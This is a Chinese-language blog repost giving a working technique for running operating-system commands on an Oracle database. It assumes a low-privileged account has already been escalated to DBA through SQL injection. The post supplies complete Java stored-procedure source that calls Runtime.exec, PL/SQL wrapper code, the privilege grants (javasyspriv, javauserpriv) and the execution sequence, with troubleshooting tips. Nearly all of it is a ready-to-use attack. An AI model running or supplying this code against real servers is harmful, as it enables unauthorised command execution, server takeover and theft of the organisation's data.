前奏:
需要利用有REscourse权限的用户比如SCOTT登录Oracle并用SQLInjection提权至DBA权限
网上有一种执行OS命令的方法:
c:\1.sql
create or replace and compile
java souRCe named "util"
as
import java.io.*;
import java.lang.*;
public class util extends Object
{
public static int RunThis(String args)
{
Runtime rt = Runtime.getRuntime();
int RC = -1;
try
{
Process p = rt.exec(args);
int bufSize = 4096;
BufferedInputStream bis =new BufferedInputStream(p.getInputStream(), bufSize);
int len;
byte buffer[] = new byte[bufSize];
// Echo back what the program spit out
while ((len = bis.read(buffer, 0, bufSize)) != -1)
System.out.write(buffer, 0, len);
RC = p.waitFor();
}
catch (Exception e)
{
e.printStackTrace();
RC = -1;
}
finally
{
return RC;
}
}
}
c:\2.sql
create or replace
function RUN_CMz(p_cmd in varchar2) return number
as
language java
name 'util.RunThis(java.lang.String) return integer';
c:\3.sql
create or replace procedure RC(p_cmd in varChar)
as
x number;
begin
x := RUN_CMz(p_cmd);
end;
登陆上去后依旧是依次执行
SQL> @c:\1.sql
/
@c:\2.sql
/
@c:\3.sql
/
variable x number;
set serveroutput on;
exec dbms_java.set_output(100000);
grant javasyspriv to system;
grant javauserpriv to system; 网上的方法没有这一行,我无法成功,加上去可以
exec :x:=run_cmz('ipconfig');
注意:最后加亮的两句~这里的system要对应你登录的用户名~比如用scott登录的~就要更改为scott,另外如果第一次执行错误要退出后从新登录再顺序执行~否则Oracle会一直提示权限不够~
本文转sinojelly51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/397547,如需转载请自行联系原作者
